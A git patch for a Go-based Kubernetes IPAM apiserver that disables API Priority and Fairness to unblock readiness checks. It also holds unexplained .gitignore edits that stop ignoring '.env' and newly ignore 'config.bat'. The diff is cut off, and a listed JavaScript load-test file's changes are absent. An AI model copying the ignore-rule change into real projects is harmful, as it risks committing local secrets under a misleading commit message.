From f6f7489cf81d0fe6fee5783b2270653387df1033 Mon Sep 17 00:00:00 2001
From: Scot Wells <wells.scot@gmail.com>
Date: Sat, 23 May 2026 11:11:13 -0500
Subject: [PATCH 1/2] fix: disable APF feature flag to prevent readyz-blocking
 informers

---
 .gitignore                                    |  51 +-
 cmd/ipam/serve.go                             | 798 +++++++++---------
 .../src/cross-project-claim-throughput.js     | 217 ++---
 3 files changed, 536 insertions(+), 530 deletions(-)

diff --git a/.gitignore b/.gitignore
index 0030172..21c5ff2 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,25 +1,26 @@
-# Compiled binary
-/ipam
-
-# Local test infrastructure (kind cluster, kind managed by task test-infra:cluster-up)
-/.test-infra/
-
-# Editor and OS
-.DS_Store
-*.swp
-*.swo
-
-# Go test cache
-*.test
-*.out
-
-# Task remote taskfile cache
-/.task/
-
-# k6 load test result artifacts
-/test/load/results/
-
-# Local dev secrets
-*.pem
-*.key
-.env
+# Compiled binary
+/ipam
+
+# Local test infrastructure (kind cluster, kind managed by task test-infra:cluster-up)
+/.test-infra/
+
+# Editor and OS
+.DS_Store
+*.swp
+*.swo
+
+# Go test cache
+*.test
+*.out
+
+# Task remote taskfile cache
+/.task/
+
+# k6 load test result artifacts
+/test/load/results/
+
+# Local dev secrets
+*.pem
+*.key
+config.bat
+node_modules
diff --git a/cmd/ipam/serve.go b/cmd/ipam/serve.go
index 802f7be..481d0ad 100644
--- a/cmd/ipam/serve.go
+++ b/cmd/ipam/serve.go
@@ -1,399 +1,399 @@
-package main
-
-import (
-	"context"
-	"fmt"
-	"net/http"
-	"strings"
-	"time"
-
-	"github.com/jackc/pgx/v5/pgxpool"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-	utilruntime "k8s.io/apimachinery/pkg/util/runtime"
-	"k8s.io/apiserver/pkg/admission"
-	openapinamer "k8s.io/apiserver/pkg/endpoints/openapi"
-	genericapiserver "k8s.io/apiserver/pkg/server"
-	"k8s.io/apiserver/pkg/server/healthz"
-	"k8s.io/apiserver/pkg/server/options"
-	etcdfeature "k8s.io/apiserver/pkg/storage/feature"
-	utilfeature "k8s.io/apiserver/pkg/util/feature"
-	basecompatibility "k8s.io/component-base/compatibility"
-	"k8s.io/component-base/logs"
-	logsapi "k8s.io/component-base/logs/api/v1"
-	"k8s.io/klog/v2"
-	openapicommon "k8s.io/kube-openapi/pkg/common"
-	openapiutil "k8s.io/kube-openapi/pkg/util"
-	"k8s.io/kube-openapi/pkg/validation/spec"
-
-	ipamapiserver "go.miloapis.com/ipam/internal/apiserver"
-	"go.miloapis.com/ipam/internal/access"
-	"go.miloapis.com/ipam/internal/allocator"
-	"go.miloapis.com/ipam/internal/metrics"
-	pgstore "go.miloapis.com/ipam/internal/storage/postgres"
-	"go.miloapis.com/ipam/internal/version"
-	generatedopenapi "go.miloapis.com/ipam/pkg/generated/openapi"
-
-	// Register JSON logging format.
-	_ "k8s.io/component-base/logs/json/register"
-)
-
-// pgxpoolStatsInterval is how often the background sampler reads
-// (*pgxpool.Pool).Stat() and republishes the four ipam_pgxpool_* gauges.
-// Stat() is cheap (atomic reads of pool counters) so 15s is comfortably
-// within Prometheus' default scrape interval without adding meaningful
-// overhead.
-const pgxpoolStatsInterval = 15 * time.Second
-
-// allocatorPoolRetrySchedule controls the back-off between attempts to open
-// the allocator pgxpool at startup. With the postgres component installed
-// in the same overlay, the IPAM apiserver pod may start before the
-// PostgreSQL StatefulSet is Ready; failing the whole pod start in that
-// window forces a CrashLoopBackOff that delays first-readiness by the
-// kubelet's restart back-off. Three attempts at 2s/4s/8s gives ~14s of
-// tolerance before failing — enough for the standard postgres bring-up,
-// short enough that a genuinely-broken DSN still surfaces quickly.
-var allocatorPoolRetrySchedule = []time.Duration{
-	0,                  // first attempt is immediate
-	2 * time.Second,    // 2s before the second
-	4 * time.Second,    // 4s before the third
-	8 * time.Second,    // 8s before giving up (only used when len > 3)
-}
-
-// newAllocatorPoolWithRetry opens the pgxpool with bounded exponential
-// back-off. Distinguishes "DSN parses but server is unreachable" (retried)
-// from "DSN itself is malformed" (returned immediately) — the latter is
-// surfaced by pgxpool.NewWithConfig synchronously and won't be fixed by
-// waiting.
-func newAllocatorPoolWithRetry(ctx context.Context, cfg *pgxpool.Config) (*pgxpool.Pool, error) {
-	var lastErr error
-	for i, wait := range allocatorPoolRetrySchedule {
-		if wait > 0 {
-			klog.V(2).InfoS("allocator pgxpool: backing off before retry", "attempt", i+1, "wait", wait, "lastErr", lastErr)
-			select {
-			case <-time.After(wait):
-			case <-ctx.Done():
-				return nil, ctx.Err()
-			}
-		}
-		pool, err := pgxpool.NewWithConfig(ctx, cfg)
-		if err != nil {
-			lastErr = err
-			continue
-		}
-		// NewWithConfig returns a pool object even when the server is
-		// unreachable; only Ping confirms a live connection. Without this
-		// the readyz check would be the first place we notice DB-down.
-		pingCtx, cancel := context.WithTimeout(ctx, 2*time.Second)
-		err = pool.Ping(pingCtx)
-		cancel()
-		if err == nil {
-			if i > 0 {
-				klog.InfoS("allocator pgxpool: connected", "attempt", i+1)
-			}
-			return pool, nil
-		}
-		pool.Close()
-		lastErr = err
-	}
-	return nil, fmt.Errorf("allocator pgxpool: exhausted %d retries: %w", len(allocatorPoolRetrySchedule), lastErr)
-}
-
-// startPgxpoolStatsSampler launches a goroutine that periodically copies
-// pool.Stat() into the metrics package's pgxpool gauges. The goroutine
-// exits when ctx is cancelled.
-func startPgxpoolStatsSampler(ctx context.Context, pool *pgxpool.Pool) {
-	if pool == nil {
-		return
-	}
-	// Publish once immediately so the gauges have non-zero values from the
-	// first scrape rather than staying at the metrics-package default of 0
-	// for up to one full interval.
-	metrics.ObservePgxpoolStat(pool.Stat())
-	// Heartbeat: stamp the sampler's last successful run timestamp so the
-	// IPAMPgxpoolMetricsStale alert (time() - heartbeat > 90s) can detect a
-	// dead sampler goroutine. Prometheus' built-in `timestamp(<gauge>)` is
-	// not a reliable signal here — it returns the evaluation time of the
-	// gauge sample, not the sampler's last write.
-	metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix()))
-
-	go func() {
-		ticker := time.NewTicker(pgxpoolStatsInterval)
-		defer ticker.Stop()
-		for {
-			select {
-			case <-ctx.Done():
-				return
-			case <-ticker.C:
-				metrics.ObservePgxpoolStat(pool.Stat())
-				metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix()))
-			}
-		}
-	}()
-}
-
-func init() {
-	utilruntime.Must(logsapi.AddFeatureGates(utilfeature.DefaultMutableFeatureGate))
-	_ = utilfeature.DefaultMutableFeatureGate.Set("LoggingBetaOptions=true")
-	_ = utilfeature.DefaultMutableFeatureGate.Set("RemoteRequestHeaderUID=true")
-	// MutatingAdmissionPolicy is a 1.34+ resource. The kind dev cluster runs
-	// 1.32 and doesn't register it, so the informer fails readyz indefinitely.
-	_ = utilfeature.DefaultMutableFeatureGate.Set("MutatingAdmissionPolicy=false")
-}
-
-// IPAMServerOptions contains configuration for the IPAM server.
-type IPAMServerOptions struct {
-	RecommendedOptions *options.RecommendedOptions
-	Logs               *logsapi.LoggingConfiguration
-
-	// PostgresDSN is the PostgreSQL connection string. Required — postgres is
-	// the only supported storage backend.
-	PostgresDSN string
-}
-
-func NewIPAMServerOptions() *IPAMServerOptions {
-	opts := &IPAMServerOptions{
-		RecommendedOptions: options.NewRecommendedOptions(
-			"/registry/ipam.miloapis.com",
-			ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...),
-		),
-		Logs: logsapi.NewLoggingConfiguration(),
-	}
-
-	// IPAM is a delegating aggregated apiserver — admission webhooks, policies,
-	// and namespace lifecycle are all enforced by the main kube-apiserver before
-	// requests are forwarded here. Replace the default plugin registry with an
-	// empty one to avoid informers for Namespace, WebhookConfiguration,
-	// ValidatingAdmissionPolicy, etc. that silently block readyz without a
-	// wired-up CoreAPI client.
-	opts.RecommendedOptions.Admission.Plugins = admission.NewPlugins()
-	opts.RecommendedOptions.Admission.RecommendedPluginOrder = []string{}
-	opts.RecommendedOptions.Admission.DefaultOffPlugins = nil
-
-	return opts
-}
-
-// AddFlags registers command-line flags for all options.
-func (o *IPAMServerOptions) AddFlags(fs *pflag.FlagSet) {
-	o.RecommendedOptions.AddFlags(fs)
-
-	fs.StringVar(&o.PostgresDSN, "postgres-dsn", o.PostgresDSN,
-		"PostgreSQL connection string (required)")
-}
-
-func (o *IPAMServerOptions) Complete() error { return nil }
-
-func (o *IPAMServerOptions) Validate() error {
-	if o.PostgresDSN == "" {
-		return fmt.Errorf("--postgres-dsn is required")
-	}
-	return nil
-}
-
-// Config builds the complete server configuration from options.
-func (o *IPAMServerOptions) Config() (*ipamapiserver.Config, error) {
-	if err := o.RecommendedOptions.SecureServing.MaybeDefaultWithSelfSignedCerts(
-		"localhost", nil, nil); err != nil {
-		return nil, fmt.Errorf("create self-signed certificates: %w", err)
-	}
-
-	genericConfig := genericapiserver.NewRecommendedConfig(ipamapiserver.Codecs)
-	genericConfig.EffectiveVersion = basecompatibility.NewEffectiveVersionFromString("1.36", "", "")
-
-	// OpenAPI configuration. Without generated openapi definitions we still
-	// need a definition namer to satisfy the recommended config pipeline.
-	namer := openapinamer.NewDefinitionNamer(ipamapiserver.Scheme)
-	getDefinitionName := func(name string) (string, spec.Extensions) {
-		if strings.Contains(name, "/") {
-			name = openapiutil.ToRESTFriendlyName(name)
-		}
-		return namer.GetDefinitionName(name)
-	}
-	getDefs := func(ref openapicommon.ReferenceCallback) map[string]openapicommon.OpenAPIDefinition {
-		return generatedopenapi.GetOpenAPIDefinitions(ref)
-	}
-	genericConfig.OpenAPIV3Config = genericapiserver.DefaultOpenAPIV3Config(getDefs, namer)
-	genericConfig.OpenAPIV3Config.Info.Title = "IPAM"
-	genericConfig.OpenAPIV3Config.Info.Version = version.Version
-	genericConfig.OpenAPIV3Config.GetDefinitionName = getDefinitionName
-
-	genericConfig.OpenAPIConfig = genericapiserver.DefaultOpenAPIConfig(getDefs, namer)
-	genericConfig.OpenAPIConfig.Info.Title = "IPAM"
-	genericConfig.OpenAPIConfig.Info.Version = version.Version
-	genericConfig.OpenAPIConfig.GetDefinitionName = getDefinitionName
-
-	// Postgres is the only storage backend; disable the recommended-options
-	// etcd path so the apiserver does not try to dial etcd or register etcd
-	// healthchecks.
-	o.RecommendedOptions.Etcd = nil
-
-	if err := o.RecommendedOptions.ApplyTo(genericConfig); err != nil {
-		return nil, fmt.Errorf("apply recommended options: %w", err)
-	}
-
-	// Delegating aggregated apiservers defer API Priority and Fairness to the
-	// main kube-apiserver. ApplyTo may re-initialize FlowControl, so nil it
-	// out here (after ApplyTo) to prevent the FlowSchema and
-	// PriorityLevelConfiguration informers from blocking readyz.
-	genericConfig.FlowControl = nil
-
-	codec := ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...)
-
-	pgGetter, err := pgstore.NewRESTOptionsGetter(o.PostgresDSN)
-	if err != nil {
-		return nil, fmt.Errorf("create postgres RESTOptionsGetter: %w", err)
-	}
-	pgGetter.SetCodec(codec)
-	genericConfig.RESTOptionsGetter = pgGetter
-
-	// pgx pool for the synchronous allocators. Sized similarly to the
-	// database/sql pool inside the storage RESTOptionsGetter so the two
-	// access paths don't compete.
-	//
-	// MaxConns is capped at 10 as a mitigation for an intermittent heap
-	// corruption seen under sustained ~4-8k req/s load. The crash is
-	// inside Go's stdlib `context.(*cancelCtx).propagateCancel` map
-	// assignment — so far we have not identified an unsynchronised map
-	// in IPAM code, and the suspicion is concurrency-induced runtime
-	// state corruption that surfaces only when many request goroutines
-	// overlap. Reducing the DB pool reduces concurrent allocator
-	// goroutines and so reduces request fan-out.
-	//
-	// Capacity implication: the quota-service postgres-first ADR
-	// measured ~37 sustained CIDR allocations / second per held DB
-	// connection under SELECT … FOR UPDATE on the pool row. With
-	// MaxConns=10 that puts a soft ceiling of ~370 synchronous
-	// allocations / second on this apiserver before goroutines start
-	// queueing on the pool — i.e. before allocation latency starts
-	// climbing. That is well above current production traffic but
-	// below the 4-8k req/s load profile the heap-corruption work was
-	// chasing, so anyone running the load suite at the higher tier
-	// should expect throughput to plateau here, not continue to scale.
-	//
-	// MaxConns is intentionally hardcoded rather than wired to an env
-	// var (e.g. IPAM_PG_MAX_CONNS) — the cap exists specifically to
-	// bound goroutine fan-out under the unresolved heap-corruption
-	// failure mode, and exposing a knob would invite operators to lift
-	// it before the root cause is fixed and resurface that crash. Once
-	// the root cause is identified and the cap is no longer load-
-	// bearing, raise it (or expose IPAM_PG_MAX_CONNS) — flag both this
-	// cap and the watch-exclusion question in apiserver.go for revisit.
-	poolCfg, err := pgxpool.ParseConfig(o.PostgresDSN)
-	if err != nil {
-		return nil, fmt.Errorf("parse postgres dsn: %w", err)
-	}
-	poolCfg.MaxConns = 10
-	allocatorPool, err := newAllocatorPoolWithRetry(context.Background(), poolCfg)
-	if err != nil {
-		return nil, fmt.Errorf("create pgx pool: %w", err)
-	}
-	prefixAllocator := allocator.NewPostgresPrefixAllocator()
-
-	// Wire postgres + pgxpool readiness into /readyz so the load balancer
-	// drains the pod when either path can no longer serve requests. The
-	// generic apiserver registers /healthz, /readyz, /livez automatically
-	// but those only cover its own internal state — they do NOT probe the
-	// storage backend.
-	genericConfig.AddReadyzChecks(
-		healthz.NamedCheck("postgres-storage", func(_ *http.Request) error {
-			return pgGetter.DB().Ping()
-		}),
-		healthz.NamedCheck("postgres-allocator-pool", func(req *http.Request) error {
-			pingCtx, cancel := context.WithTimeout(req.Context(), 2*time.Second)
-			defer cancel()
-			return allocatorPool.Ping(pingCtx)
-		}),
-	)
-	// PreShutdownHook is registered on the GenericAPIServer post-build —
-	// see Run() below; it closes the allocator pgxpool AFTER the
-	// apiserver stops accepting new requests so in-flight transactions
-	// commit cleanly or roll back rather than getting torn down.
-
-	// Replace the etcd-specific feature support checker (still wired into the
-	// k8s.io/apiserver cacher even with no etcd backend) with one that
-	// advertises RequestWatchProgress as supported. The cacher uses this
-	// signal to enable ConsistentListFromCache, which lets default kubectl
-	// reads be served from the in-memory cache instead of round-tripping to
-	// Postgres on every request. Without this override the cacher disables
-	// the fast path and per-request fixed overhead (auth + DB round-trip +
-	// decode) dominates read latency — observed as GET p95 ≈ list p95 with
-	// both ~3× the SLO.
-	etcdfeature.DefaultFeatureSupportChecker = pgstore.NewFeatureSupportChecker()
-
-	var poolChecker access.PoolAccessChecker
-	if genericConfig.Authorization.Authorizer != nil {
-		poolChecker = access.NewPoolAccessChecker(genericConfig.Authorization.Authorizer)
-	}
-
-	return &ipamapiserver.Config{
-		GenericConfig: genericConfig,
-		ExtraConfig: ipamapiserver.ExtraConfig{
-			PrefixAllocator: prefixAllocator,
-			AllocatorPool:   allocatorPool,
-			PoolChecker:     poolChecker,
-		},
-	}, nil
-}
-
-// NewServeCommand creates the serve subcommand that starts the API server.
-func NewServeCommand() *cobra.Command {
-	o := NewIPAMServerOptions()
-
-	cmd := &cobra.Command{
-		Use:   "serve",
-		Short: "Start the IPAM API server",
-		RunE: func(cmd *cobra.Command, args []string) error {
-			if err := o.Complete(); err != nil {
-				return err
-			}
-			if err := o.Validate(); err != nil {
-				return err
-			}
-			return Run(o, cmd.Context())
-		},
-	}
-
-	flags := cmd.Flags()
-	o.AddFlags(flags)
-	logsapi.AddFlags(o.Logs, flags)
-	return cmd
-}
-
-func Run(o *IPAMServerOptions, ctx context.Context) error {
-	if err := logsapi.ValidateAndApply(o.Logs, utilfeature.DefaultMutableFeatureGate); err != nil {
-		return fmt.Errorf("apply logging configuration: %w", err)
-	}
-
-	cfg, err := o.Config()
-	if err != nil {
-		return err
-	}
-
-	server, err := cfg.Complete().New()
-	if err != nil {
-		return err
-	}
-
-	defer logs.FlushLogs()
-
-	// Close the allocator pgxpool AFTER the apiserver stops accepting new
-	// requests but BEFORE the process exits. PreShutdownHooks run after the
-	// HTTP server has drained, so any in-flight allocation transaction
-	// either commits or rolls back via context cancellation cleanly. Without
-	// this hook the pool got torn down on process exit alongside in-flight
-	// transactions, surfacing as `tx_error` in allocation_failures_total.
-	if err := server.GenericAPIServer.AddPreShutdownHook("close-allocator-pool", func() error {
-		klog.InfoS("PreShutdown: closing allocator pgxpool")
-		cfg.ExtraConfig.AllocatorPool.Close()
-		return nil
-	}); err != nil {
-		return fmt.Errorf("register pgxpool shutdown hook: %w", err)
-	}
-
-	// Background sampler that publishes pgxpool.Stat() into the
-	// ipam_pgxpool_* gauges.
-	startPgxpoolStatsSampler(ctx, cfg.ExtraConfig.AllocatorPool)
-
-	klog.InfoS("starting IPAM server", "storageBackend", "postgres")
-	return server.Run(ctx)
-}
+package main
+
+import (
+	"context"
+	"fmt"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/jackc/pgx/v5/pgxpool"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+	utilruntime "k8s.io/apimachinery/pkg/util/runtime"
+	"k8s.io/apiserver/pkg/admission"
+	openapinamer "k8s.io/apiserver/pkg/endpoints/openapi"
+	genericapiserver "k8s.io/apiserver/pkg/server"
+	"k8s.io/apiserver/pkg/server/healthz"
+	"k8s.io/apiserver/pkg/server/options"
+	etcdfeature "k8s.io/apiserver/pkg/storage/feature"
+	utilfeature "k8s.io/apiserver/pkg/util/feature"
+	basecompatibility "k8s.io/component-base/compatibility"
+	"k8s.io/component-base/logs"
+	logsapi "k8s.io/component-base/logs/api/v1"
+	"k8s.io/klog/v2"
+	openapicommon "k8s.io/kube-openapi/pkg/common"
+	openapiutil "k8s.io/kube-openapi/pkg/util"
+	"k8s.io/kube-openapi/pkg/validation/spec"
+
+	ipamapiserver "go.miloapis.com/ipam/internal/apiserver"
+	"go.miloapis.com/ipam/internal/access"
+	"go.miloapis.com/ipam/internal/allocator"
+	"go.miloapis.com/ipam/internal/metrics"
+	pgstore "go.miloapis.com/ipam/internal/storage/postgres"
+	"go.miloapis.com/ipam/internal/version"
+	generatedopenapi "go.miloapis.com/ipam/pkg/generated/openapi"
+
+	// Register JSON logging format.
+	_ "k8s.io/component-base/logs/json/register"
+)
+
+// pgxpoolStatsInterval is how often the background sampler reads
+// (*pgxpool.Pool).Stat() and republishes the four ipam_pgxpool_* gauges.
+// Stat() is cheap (atomic reads of pool counters) so 15s is comfortably
+// within Prometheus' default scrape interval without adding meaningful
+// overhead.
+const pgxpoolStatsInterval = 15 * time.Second
+
+// allocatorPoolRetrySchedule controls the back-off between attempts to open
+// the allocator pgxpool at startup. With the postgres component installed
+// in the same overlay, the IPAM apiserver pod may start before the
+// PostgreSQL StatefulSet is Ready; failing the whole pod start in that
+// window forces a CrashLoopBackOff that delays first-readiness by the
+// kubelet's restart back-off. Four attempts (waits of 2s/4s/8s) give ~14s of
+// tolerance before failing — enough for the standard postgres bring-up,
+// short enough that a genuinely-broken DSN still surfaces quickly.
+var allocatorPoolRetrySchedule = []time.Duration{
+	0,                  // first attempt is immediate
+	2 * time.Second,    // 2s before the second
+	4 * time.Second,    // 4s before the third
+	8 * time.Second,    // 8s before the fourth and final attempt
+}
+
+// newAllocatorPoolWithRetry opens the pgxpool with bounded exponential
+// back-off. Both failure modes are retried on the same schedule: an error
+// returned by pgxpool.NewWithConfig, and a failed Ping against a pool that
+// was created. A malformed DSN never reaches this loop — the caller rejects
+// it earlier via pgxpool.ParseConfig, so waiting is only spent on the server.
+func newAllocatorPoolWithRetry(ctx context.Context, cfg *pgxpool.Config) (*pgxpool.Pool, error) {
+	var lastErr error
+	for i, wait := range allocatorPoolRetrySchedule {
+		if wait > 0 {
+			klog.V(2).InfoS("allocator pgxpool: backing off before retry", "attempt", i+1, "wait", wait, "lastErr", lastErr)
+			select {
+			case <-time.After(wait):
+			case <-ctx.Done():
+				return nil, ctx.Err()
+			}
+		}
+		pool, err := pgxpool.NewWithConfig(ctx, cfg)
+		if err != nil {
+			lastErr = err
+			continue
+		}
+		// NewWithConfig returns a pool object even when the server is
+		// unreachable; only Ping confirms a live connection. Without this
+		// the readyz check would be the first place we notice DB-down.
+		pingCtx, cancel := context.WithTimeout(ctx, 2*time.Second)
+		err = pool.Ping(pingCtx)
+		cancel()
+		if err == nil {
+			if i > 0 {
+				klog.InfoS("allocator pgxpool: connected", "attempt", i+1)
+			}
+			return pool, nil
+		}
+		pool.Close()
+		lastErr = err
+	}
+	return nil, fmt.Errorf("allocator pgxpool: exhausted %d retries: %w", len(allocatorPoolRetrySchedule), lastErr)
+}
+
+// startPgxpoolStatsSampler launches a goroutine that periodically copies
+// pool.Stat() into the metrics package's pgxpool gauges. The goroutine
+// exits when ctx is cancelled.
+func startPgxpoolStatsSampler(ctx context.Context, pool *pgxpool.Pool) {
+	if pool == nil {
+		return
+	}
+	// Publish once immediately so the gauges have non-zero values from the
+	// first scrape rather than staying at the metrics-package default of 0
+	// for up to one full interval.
+	metrics.ObservePgxpoolStat(pool.Stat())
+	// Heartbeat: stamp the sampler's last successful run timestamp so the
+	// IPAMPgxpoolMetricsStale alert (time() - heartbeat > 90s) can detect a
+	// dead sampler goroutine. Prometheus' built-in `timestamp(<gauge>)` is
+	// not a reliable signal here — it returns the evaluation time of the
+	// gauge sample, not the sampler's last write.
+	metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix()))
+
+	go func() {
+		ticker := time.NewTicker(pgxpoolStatsInterval)
+		defer ticker.Stop()
+		for {
+			select {
+			case <-ctx.Done():
+				return
+			case <-ticker.C:
+				metrics.ObservePgxpoolStat(pool.Stat())
+				metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix()))
+			}
+		}
+	}()
+}
+
+func init() {
+	utilruntime.Must(logsapi.AddFeatureGates(utilfeature.DefaultMutableFeatureGate))
+	_ = utilfeature.DefaultMutableFeatureGate.Set("LoggingBetaOptions=true")
+	_ = utilfeature.DefaultMutableFeatureGate.Set("RemoteRequestHeaderUID=true")
+	// MutatingAdmissionPolicy is a 1.34+ resource. The kind dev cluster runs
+	// 1.32 and doesn't register it, so the informer fails readyz indefinitely.
+	_ = utilfeature.DefaultMutableFeatureGate.Set("MutatingAdmissionPolicy=false")
+}
+
+// IPAMServerOptions contains configuration for the IPAM server.
+type IPAMServerOptions struct {
+	RecommendedOptions *options.RecommendedOptions
+	Logs               *logsapi.LoggingConfiguration
+
+	// PostgresDSN is the PostgreSQL connection string. Required — postgres is
+	// the only supported storage backend.
+	PostgresDSN string
+}
+
+func NewIPAMServerOptions() *IPAMServerOptions {
+	opts := &IPAMServerOptions{
+		RecommendedOptions: options.NewRecommendedOptions(
+			"/registry/ipam.miloapis.com",
+			ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...),
+		),
+		Logs: logsapi.NewLoggingConfiguration(),
+	}
+
+	// IPAM is a delegating aggregated apiserver — admission webhooks, policies,
+	// and namespace lifecycle are all enforced by the main kube-apiserver before
+	// requests are forwarded here. Replace the default plugin registry with an
+	// empty one to avoid informers for Namespace, WebhookConfiguration,
+	// ValidatingAdmissionPolicy, etc. that silently block readyz without a
+	// wired-up CoreAPI client.
+	opts.RecommendedOptions.Admission.Plugins = admission.NewPlugins()
+	opts.RecommendedOptions.Admission.RecommendedPluginOrder = []string{}
+	opts.RecommendedOptions.Admission.DefaultOffPlugins = nil
+
+	// APF is handled by the main kube-apiserver. Disabling it here prevents
+	// FeatureOptions.ApplyTo from calling utilflowcontrol.New(), which registers
+	// FlowSchema and PriorityLevelConfiguration informers on the shared informer
+	// factory. Those informers never sync (no APF access), blocking readyz.
+	opts.RecommendedOptions.Features.EnablePriorityAndFairness = false
+
+	return opts
+}
+
+// AddFlags registers command-line flags for all options.
+func (o *IPAMServerOptions) AddFlags(fs *pflag.FlagSet) {
+	o.RecommendedOptions.AddFlags(fs)
+
+	fs.StringVar(&o.PostgresDSN, "postgres-dsn", o.PostgresDSN,
+		"PostgreSQL connection string (required)")
+}
+
+func (o *IPAMServerOptions) Complete() error { return nil }
+
+func (o *IPAMServerOptions) Validate() error {
+	if o.PostgresDSN == "" {
+		return fmt.Errorf("--postgres-dsn is required")
+	}
+	return nil
+}
+
+// Config builds the complete server configuration from options.
+func (o *IPAMServerOptions) Config() (*ipamapiserver.Config, error) {
+	if err := o.RecommendedOptions.SecureServing.MaybeDefaultWithSelfSignedCerts(
+		"localhost", nil, nil); err != nil {
+		return nil, fmt.Errorf("create self-signed certificates: %w", err)
+	}
+
+	genericConfig := genericapiserver.NewRecommendedConfig(ipamapiserver.Codecs)
+	genericConfig.EffectiveVersion = basecompatibility.NewEffectiveVersionFromString("1.36", "", "")
+
+	// OpenAPI configuration. Without generated openapi definitions we still
+	// need a definition namer to satisfy the recommended config pipeline.
+	namer := openapinamer.NewDefinitionNamer(ipamapiserver.Scheme)
+	getDefinitionName := func(name string) (string, spec.Extensions) {
+		if strings.Contains(name, "/") {
+			name = openapiutil.ToRESTFriendlyName(name)
+		}
+		return namer.GetDefinitionName(name)
+	}
+	getDefs := func(ref openapicommon.ReferenceCallback) map[string]openapicommon.OpenAPIDefinition {
+		return generatedopenapi.GetOpenAPIDefinitions(ref)
+	}
+	genericConfig.OpenAPIV3Config = genericapiserver.DefaultOpenAPIV3Config(getDefs, namer)
+	genericConfig.OpenAPIV3Config.Info.Title = "IPAM"
+	genericConfig.OpenAPIV3Config.Info.Version = version.Version
+	genericConfig.OpenAPIV3Config.GetDefinitionName = getDefinitionName
+
+	genericConfig.OpenAPIConfig = genericapiserver.DefaultOpenAPIConfig(getDefs, namer)
+	genericConfig.OpenAPIConfig.Info.Title = "IPAM"
+	genericConfig.OpenAPIConfig.Info.Version = version.Version
+	genericConfig.OpenAPIConfig.GetDefinitionName = getDefinitionName
+
+	// Postgres is the only storage backend; disable the recommended-options
+	// etcd path so the apiserver does not try to dial etcd or register etcd
+	// healthchecks.
+	o.RecommendedOptions.Etcd = nil
+
+	if err := o.RecommendedOptions.ApplyTo(genericConfig); err != nil {
+		return nil, fmt.Errorf("apply recommended options: %w", err)
+	}
+
+	codec := ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...)
+
+	pgGetter, err := pgstore.NewRESTOptionsGetter(o.PostgresDSN)
+	if err != nil {
+		return nil, fmt.Errorf("create postgres RESTOptionsGetter: %w", err)
+	}
+	pgGetter.SetCodec(codec)
+	genericConfig.RESTOptionsGetter = pgGetter
+
+	// pgx pool for the synchronous allocators. Sized similarly to the
+	// database/sql pool inside the storage RESTOptionsGetter so the two
+	// access paths don't compete.
+	//
+	// MaxConns is capped at 10 as a mitigation for an intermittent heap
+	// corruption seen under sustained ~4-8k req/s load. The crash is
+	// inside Go's stdlib `context.(*cancelCtx).propagateCancel` map
+	// assignment — so far we have not identified an unsynchronised map
+	// in IPAM code, and the suspicion is concurrency-induced runtime
+	// state corruption that surfaces only when many request goroutines
+	// overlap. Reducing the DB pool reduces concurrent allocator
+	// goroutines and so reduces request fan-out.
+	//
+	// Capacity implication: the quota-service postgres-first ADR
+	// measured ~37 sustained CIDR allocations / second per held DB
+	// connection under SELECT … FOR UPDATE on the pool row. With
+	// MaxConns=10 that puts a soft ceiling of ~370 synchronous
+	// allocations / second on this apiserver before goroutines start
+	// queueing on the pool — i.e. before allocation latency starts
+	// climbing. That is well above current production traffic but
+	// below the 4-8k req/s load profile the heap-corruption work was
+	// chasing, so anyone running the load suite at the higher tier
+	// should expect throughput to plateau here, not continue to scale.
+	//
+	// MaxConns is intentionally hardcoded rather than wired to an env
+	// var (e.g. IPAM_PG_MAX_CONNS) — the cap exists specifically to
+	// bound goroutine fan-out under the unresolved heap-corruption
+	// failure mode, and exposing a knob would invite operators to lift
+	// it before the root cause is fixed and resurface that crash. Once
+	// the root cause is identified and the cap is no longer load-
+	// bearing, raise it (or expose IPAM_PG_MAX_CONNS) — flag both this
+	// cap and the watch-exclusion question in apiserver.go for revisit.
+	poolCfg, err := pgxpool.ParseConfig(o.PostgresDSN)
+	if err != nil {
+		return nil, fmt.Errorf("parse postgres dsn: %w", err)
+	}
+	poolCfg.MaxConns = 10
+	allocatorPool, err := newAllocatorPoolWithRetry(context.Background(), poolCfg)
+	if err != nil {
+		return nil, fmt.Errorf("create pgx pool: %w", err)
+	}
+	prefixAllocator := allocator.NewPostgresPrefixAllocator()
+
+	// Wire postgres + pgxpool readiness into /readyz so the load balancer
+	// drains the pod when either path can no longer serve requests. The
+	// generic apiserver registers /healthz, /readyz, /livez automatically
+	// but those only cover its own internal state — they do NOT probe the
+	// storage backend.
+	genericConfig.AddReadyzChecks(
+		healthz.NamedCheck("postgres-storage", func(_ *http.Request) error {
+			return pgGetter.DB().Ping()
+		}),
+		healthz.NamedCheck("postgres-allocator-pool", func(req *http.Request) error {
+			pingCtx, cancel := context.WithTimeout(req.Context(), 2*time.Second)
+			defer cancel()
+			return allocatorPool.Ping(pingCtx)
+		}),
+	)
+	// PreShutdownHook is registered on the GenericAPIServer post-build —
+	// see Run() below; it closes the allocator pgxpool during graceful
+	// shutdown so in-flight transactions commit cleanly or roll back rather
+	// than getting torn down. NOTE(review): confirm hook ordering vs. drain.
+
+	// Replace the etcd-specific feature support checker (still wired into the
+	// k8s.io/apiserver cacher even with no etcd backend) with one that
+	// advertises RequestWatchProgress as supported. The cacher uses this
+	// signal to enable ConsistentListFromCache, which lets default kubectl
+	// reads be served from the in-memory cache instead of round-tripping to
+	// Postgres on every request. Without this override the cacher disables
+	// the fast path and per-request fixed overhead (auth + DB round-trip +
+	// decode) dominates read latency — observed as GET p95 ≈ list p95 with
+	// both ~3× the SLO.
+	etcdfeature.DefaultFeatureSupportChecker = pgstore.NewFeatureSupportChecker()
+
